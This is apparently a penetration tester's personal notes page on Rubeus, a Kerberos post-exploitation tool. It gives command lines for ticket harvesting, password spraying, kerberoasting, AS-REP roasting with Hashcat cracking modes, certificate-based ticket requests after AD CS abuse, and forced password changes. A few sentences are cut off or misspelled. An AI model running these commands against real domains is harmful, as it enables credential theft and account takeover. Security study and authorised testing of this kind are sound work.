- author:: Nathan Acks
- date:: 2022-05-11
Rubeus is a Windows-only post-exploitation tool for attacking Kerberos. No compiled binaries are available (either through the GitHub repo or Kali Linux’s
NOTE: To use Rebueus you need to already be on the domain you are attacking, or alternately need to have mapped the domain controller (which normally hosts the KDC) IP address properly in C:/Windows/System32/drivers/etc/hosts.
Harvest Kerberos Tickets
# Harvest ticket granting tickets observed by the current machine. # Probably works best when run on a domain controller. # Rubeus.exe harvest /interval:30
# Spray the specified password across all known users and generate a # ticket giving ticket for successful authentications. (Can trigger # account lockouts!) # Rubeus.exe brute /password:ThePasswordToSpray /noticket
# Extract password hashes for all known kerberoastable accounts using # Rubeus. # Rubeus.exe kerberoast
The password hashes output here can then be cracked with Hashcat (use the 13100 hash mode).
# AS-REP roasting with Rubeus. # Rubeus.exe asreproast
To use Hashcat to crack the hashes obtained in this fashin, first insert
23$ after the leading
$kerb5asrep$23$) and then use mode 18200.
Using a Certificate to Request a Ticket
# Request a ticket using a certificate from AD CS. # Rubeus.exe asktgt /user:$USER ` /enctype:aes256 ` /certificate:$CERTIFICATE_FILE ` /password:$CERTIFICATE_FILE_PASSWORD ` /outfile:$TICKET_FILE ` /domain:$DOMAIN ` /dc:$DC_IP_ADDRESS
This is very useful if we’ve used an AD CS misconfiguration as described by SpectreOps’ “Certified Pre-Owned” research to forge a certificate that’s valid for another user.
Change a User’s Password
# We can use Rubeus to change the password for domain users so long as # our ticket is for a user with permission to do so (generally the user # themselves or a domain admin. # Rubeus.exe changepw /ticket:$TICKET_FILE ` /new:$NEW_PASSWORD ` /dc:$DC_IP_ADDRESS ` /targetuser:$DOMAIN\$USER